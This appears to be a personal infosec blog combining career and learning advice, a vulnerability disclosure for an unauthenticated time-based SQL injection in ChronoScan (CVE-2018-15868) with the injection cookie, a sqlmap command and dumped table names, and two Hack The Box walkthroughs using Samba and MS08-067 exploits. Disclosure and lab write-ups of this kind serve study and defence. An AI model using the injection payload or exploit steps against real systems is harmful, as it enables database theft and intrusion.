RedSec

Another Information Security Blog

InfoSec is very much a hands on field as you have to know a little bit about a lot of different things. I don’t suggest taking classes (a lot of them are just snake oil) as there are so many different resources online that are minimal cost and which give you a lab environment to test in. I’ll outline all the ones I use and trust below. All of this is assuming you have basic knowledge of how computer and networks operate. If you can’t explain what happens (at a highish level) when your computer makes a request to https://google.com, I suggest you take the CompTIA Network+ and CompTIA Security+ prior to deep diving into security. If you know how things work (definitely relative 😃), or feel comfortable with your knowledge, skip those two. InfoSec is not a hold-my-hand field. You will fail at things and not understand why. I fail at things and do not understand why. Following a very popular phrase in the InfoSec world, simply, Try Harder. You must get your hands dirty to really succeed in InfoSec. I highly suggest you all open an account in AWS and making your labs there. If you don’t know how AWS works, there are a plethora of resources on how to do it. Or, sign up and poke around, you’ll get it. At the end of the day, you have to be able to find the answer, if you don’t know it. On to the good stuff, next section is about what types of jobs there are in InfoSec (and what is required), followed by learning resources, and finally, a way to keep up to date with news.

Jobs, Positions, and Certs Breaking into security is very difficult. Unfortunately, many people spend years trying to get into it. This is because nearly every security job requires previous experience in security. However, you can do some things that will greatly increase your chances. The first thing I would do is identify what type of security truly interests you. Below are some of the types of security positions. And with all these positions, having strong analytical skills is a must. • InfoSec/SOC Analyst o Job requires looking at security software alerts and triaging them. Basically the front man for security alerts and incidents. Definitely should have a good understanding of a lot of different topics (pen testing, incident response, etc). Being able to correlate incidents and alerts is key to this position. • InfoSec Engineer o Builds/deploys security systems and tools for the analyst to use. Has a deep understanding of how things function and how they are architected. • InfoSec Software Engineer (sometimes just called software engineers if the parent org is a security company) o A programmer that specializes in security software. If you like programming, I suggest this, there is a huge market for it. • Forensics o A highly technical position that really requires a lot of knowledge about attacks and how they work. As well as understanding how to handle and gather evidence and do attribution/correlation. • Penetration Tester/Red Team o Penetration testing is basically a hacker that is paid by companies to attempt to break into them. Or an internal person that vets applications in the same way. For example, I pen test all of our web apps (and vendors) before we allow them to run code in our environment. o Red teaming is an extension of pen testing where a team of pen testers have very (months/years) long engagements where they emulate a real APT (advance persistent threat) actor. • Incident Response/SOC Analyst/Blue Team o Responding to events from security tools and gathering intel on events. • Malware Analyst/Reverse Engineering o Person who dissects malware for AV companies trying to learn more about it. If you like debugging apps and assembler, this is the spot for you.

Each company is fairly different and there is no set way on what types of positions company hire. The more intro positions are analyst spots or Jr pen testers. A great way to get into information security is to get into a help desk spot where you are constantly fixing things. This exponentially helps your knowledge of “how things work.” You definitely can jump right into a InfoSec position, however, it would be really helpful to have some good certs to back up your experience. To expand on this, here are some Certs that are good (beware, there are a TON of crap certs that are marketed well): • CompTIA Network+ o Great introduction and shows you have an understanding of “how things work” • CompTIA Security+ o Great introduction to security. • CEH o To be frank, I hate recommending this cert… Even though I have it. It’s multiple choice and very simple. I was thoroughly disappointed with it. • OSCP o This is the “gold standard” of penetration testing certs. No multiple choice here. You have 24 hours to hack into various machines in their lab environment. Then, you have to write a report about it. There are no limits on what you are allowed to use. They encourage (and you kind of have to) you to use any resource you need (ie, Google). People fail multiple times before they pass it. The course and test are about $1200, but a retest is only $60. As you can see, they expect you to fail. • OSCE o Big brother to the OSCP, extremely hard cert. 48 hour lab, focusing on exploitation development and bypassing DEP, ASLR, and other endpoint protections. • SANS Certs o SANS is an organization that offers masters in cyber security (super expensive) and that has probably the highest quality certs available. They have courses in every different aspect of security. This comes at a price though. The courses are only taught in person (group setting, they have them multiple different locations a year), simulcast (live feed), or by online material (pre-recorded classes). They start at $6,000. Normally, companies pay for SANS certs, however, you are more than welcome to fork over that amount. o Here is their “roadmap” https://sans.org/roadmap

With the CompTIA and CEH, you can buy the official book and pass relatively easily. The OSCP/E and SANS course material are only through the companies. If you are going to go for one of the first three certs, again, I highly recommend you learn how things work by building stuff out in AWS. It’s cheap and you can’t mess anything up (or if you do, shut it all down and restart 😃). On to the learning resources.

Learning Resources I’m going to list a lot of things that I use currently and in the past. This is by no means a full list of everything. These are, in my opinion, the top resources for learning hacking/security. I’ve also attached my bookmarks folder for additional resources I’ve found helpful.

• Books o Web hacking 101 book (great read with examples, this is a copy that I bought and uploaded to drive to share) – https://drive.google.com/file/d/0B3UiWsJrcvPyZmpTVTFoeVhYdGs/view?usp=sharing o ($) The “go-to” introduction book for hacking – https://nostarch.com/pentesting o ($) Hacker playbook 2 (Second edition, more up to date) – https://amzn.to/2NTDNok o ($) Hacker playbook 3 (Red team edition, more advanced attacks) – https://amzn.to/2DdM4PS o ($) Advanced Penetration Testing (very complex methods) – https://amzn.to/2ODGfwu o ($) Art of Exploitation (I would read this one last, old, but an overall good read) – https://amzn.to/2pm0FyM o ($) Anything published by NoStarch press. They have high quality InfoSec books with great material. Wide variety of material (not just hacking) including malware analysis and programming.  https://nostarch.com/catalog/security o Two books that are on my desk are the RTFM and BTFM, both are like $10 and so worth it if you have a job in InfoSec  RTFM (Red Team Field Manual) – https://amzn.to/2xzCMYq  BTFM (Blue Team Field Manual) – https://amzn.to/2DcAWCP • Online learning material o (free and paid) Hack The Box (pen testing labs, you have to “hack” your way in) I use this almost daily. Insanely good resource for hands on labs. The paid membership is well worth it. – https://www.hackthebox.eu/ o (free and paid) Pentester Lab, Web application specific, excellent resource for learning web application attacks. I highly recommend the “Web for pentester” and “Web for pentester II” as they give detailed walkthroughs of each type of vulnerability and how to find it – https://pentesterlab.com/https://pentesterlab.com/exercises/web_for_pentesterhttps://pentesterlab.com/exercises/web_for_pentester_II o (free) VulnHub, people will post intentionally vulnerable isos. They range in difficulty. – https://www.vulnhub.com/  You have to launch these in a VM locally. o (paid) Virtual Hacking Labs (haven’t used as it’s a little pricy, but I’ve heard great things about it) – https://www.virtualhackinglabs.com/

There is a ton of material out there. I highly recommend starting with this list and expanding. To do a lot of these, you will need a linux VM. Either use virutalbox or vmware workstation (or AWS) to host your hacking box. I recommend using Kali Linux, it has nearly every tool you need pre-installed and it’s made/kept up to date by the company that makes the OSCP/OSCE… They know what they are doing.

Ways to Keep Up To Date Podcasts: * SANS ISC – Daily podcast reviewing news, very short 5 min – https://isc.sans.edu/podcast.html * Risky Business – Weekly podcast on Tuesday’s (sometimes specials during the week). Really good one reviewing news, 1 hour long – https://risky.biz Rally Sec – Decent, just started listening to this one Unsupervised Learning – Tech podcast covering all of tech news. I like this one a lot for general stuff.

Twitter (not even kidding), just go to my “people I follow” and if they have something to do with security in their name or bio, follow them. There are too many to name here. Seriously, it’s insane how great Twitter is for keeping up to date. I’ll find out about new threats days before they are officially reported on.

Conclusion That was a lot of stuff. I recommend taking a little bit to read it all again to thoroughly understand it all. After that, there is no real starting point, so just dive right in.

Background

ChronoScan is an OCR software created by ChronoScan Capture S.L. used to read and parse of data from documents it receives. The software will take a document/pdf and based on how you have it setup, parse selected data from the input file. This is especially helpful in situations where there is an automated process sending a high number of documents that need to be put into a database or some other type of storage quickly. They have a community and enterprise versions.

Vulnerability

I've identified an unauthenticated time-based SQL injection on the latest ChronoScan enterprise version (v1.5.4.3 as of 8-24-2018). This vulnerability has not yet been confirmed on other versions but, due to the nature of the attack (unauthenticated, no specific parameters, etc), I believe it's present on all versions up to this point. I will update this post when the vendor has confirmed to which versions are affected.

The vulnerability lies in how the wcr_machineid cookie is used with identifying users and the sessions associated with them. In this case, it seems as though the wcr_machineid cookie is inserted unsanitized into a SQL statement to check the current “machines” access level. An unauthenticated attacker can (even without a valid wcr_machineid cookie) exploit a time-based SQL injection. Below is the request that was originally used for identification.

GET / HTTP/1.1
Host: vulnerable:10000
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Connection: close
Cache-Control: max-age=0
Referer: http://vulnerable:10000/?wtd=VQWist5qQW3IS6uy
Cookie: wcr_machineid=')waitfor%20delay'0%3a0%3a20'--; wcr_uspw=deleted; wcr_repw=1

If you compare this request (a delay of 20 seconds) to one without the SQL statement, you will see it takes ~20 seconds for the response to come back. I took this and ran the following command in sqlmap which led to confirmation of a vulnerability.

sqlmap -u "http://vulnerable:10000" --cookie="wcr_machineid=*;wcr_uspw=deleted;wcr_repw=1"

After confirmation, I dumped the following databases.

[*] CHRONOSCAN
[*] master
[*] model
[*] msdb
[*] tempdb

Dumping the tables (60 total) from the CHRONOSCAN database gave me the following.

[12:01:33] [INFO] fetching tables for database: CHRONOSCAN
[12:01:33] [INFO] fetching number of tables for database 'CHRONOSCAN'
[12:01:33] [INFO] resumed: 60
[12:01:33] [INFO] resumed: dbo.chrono_Buyers
[12:01:33] [INFO] resumed: dbo.chrono_Suppliers
[12:01:33] [INFO] resumed: dbo.chronosys_csi_export_history
[12:01:33] [INFO] resumed: dbo.chronosys_csi_user_params
[12:01:33] [INFO] resumed: dbo.chronosys_doctype_options
[12:01:33] [INFO] resumed: dbo.chronosys_entities
[12:01:33] [INFO] resumed: dbo.chronosys_entities_params
[12:01:33] [INFO] resumed: dbo.chronosys_entity_masterkey_line_account
[12:01:33] [INFO] resumed: dbo.chronosys_event_track
[12:01:33] [INFO] resumed: dbo.chronosys_job_types_cache
(snip)

Timeline

-August 24, 2018: Vulnerability Identified -August 24, 2018: Vendor Notified & Acknowledged -August 24, 2018: CVE ID requested -August 24, 2018: CVE-2018-15868 reserved -August 27, 2018: Details provided to MITRE -August 28, 2018: Vendor issues patch for verification (not public yet)

The “Lame” box was categorized as a easy-intermediate box, so I decided that it would be next on my list.

I found it to be fairly easy, giving it a 2 out of 10 for difficulty.

 

Intelligence Gathering

Data Given: IP: 10.10.10.3 OS: Linux

I first pinged the host and confirmed that it was up. I then ran the following nmap scan for a general sweep of what ports were open. I do these types of scans to find any low hanging fruit that may be there. nmap -sS -sC -sV -T4 10.10.10.3 Imgur

Okay, so we have a few things that look interesting. The out of date vsftp & samba are probably how we want to get in. I looked around online for the samba version as I think I had heard of a large exploit for that recently. Luckily, rapid7 had a module at the top of my search.

The version that it was reporting was “3.0.20” which correlates with the version that rapid7 reported for the “username map script” RCE. Imgur

 

Exploitation

This module does not support checking so we are going to have to trust that nmap was not lying to us. Imgur

 

Post Exploitation

It wasn't! Unfortunately, this dropped us into a limited shell. Pentest monkey (http://pentestmonkey.net/blog/post-exploitation-without-a-tty) has a great way to gain a full TTY shell. Since I am comfortable with python, I used the whereis python command to see if it was installed. Imgur

Now that I know it is installed (and I can use it) I run the following command to gain a full TTY shell. python -c ‘import pty; pty.spawn(“/bin/sh”)’ Imgur

We are already root so lets grab the flags and move on to the next one.

 

Conclusion

I did have a trip up when I was initially trying to hack this box. I went for the vsftpd daemon first, but for some reason couldn't get a shell back. I'm going to attribute the name “lame” for that very reason. I liked this one, but I think in the future I am going to stop relying on metasploit so much and try and learn to use python/ruby scripts to send the exploits.

After taking a break from writing blogs about hacking, I thought I'd jump back into it. This write up is going to be covering the “Legacy” box from Hack The Box. If you haven't seen or heard about Hack The Box, I highly recommend you try it out.

I chose Legacy as it is a retired box, so that means you can do a write up about it. I will be trying to hack all of the retired boxes and writing about my experiences.  

Intelligence Gathering

Data given: IP: 10.10.10.4 OS: Windows

I first pinged the remote host to confirm it was online. I then ran an nmap scan with the parameters below. nmap 10.10.10.4 Imgur

Knowing that port 139 and 445 were open, I ran a more targeted scan to enumerate more about those services. nmap -sC -sV -A -p139,445,3389 10.10.10.4 Imgur This is a much more interesting scan result. It looks to be a Windows XP or 2000 box. I assume the name of the box “Legacy” refers to the version.

 

Vulnerability Analysis

I did a quick search with searchsploit for “Windows 2000” and noticed this result. Imgur

 

Exploitation

I fired up metasploit and loaded the module for MS08-067. Imgur

I set the target to the remote host and to verify that it was actually vulnerable, I used the “check” command in metasploit. Imgur

Sweet! Let's exploit now! Imgur Awesome, it worked!

 

Post Exploitation

Next goal is to get the flags for both the user and root (Administrator in this case). Both flags on are on each user's desktop. To do this, I'll drop into a shell session on the host. I need to see if I can get the flags without having to do any sort of privesc. Imgur I was able to grab the user flag without having to do any sort of privesc. Now, let's try the same thing for the Administrator account. Imgur Alright! That wasn't bad at all. On to the next one!

 

Conclusion

This was a very easy lab that had us use MS08-067 on a Windows XP computer. I didn't use any outside resources on this one, besides searchsploit, which can be found here. Looking forward to the next one!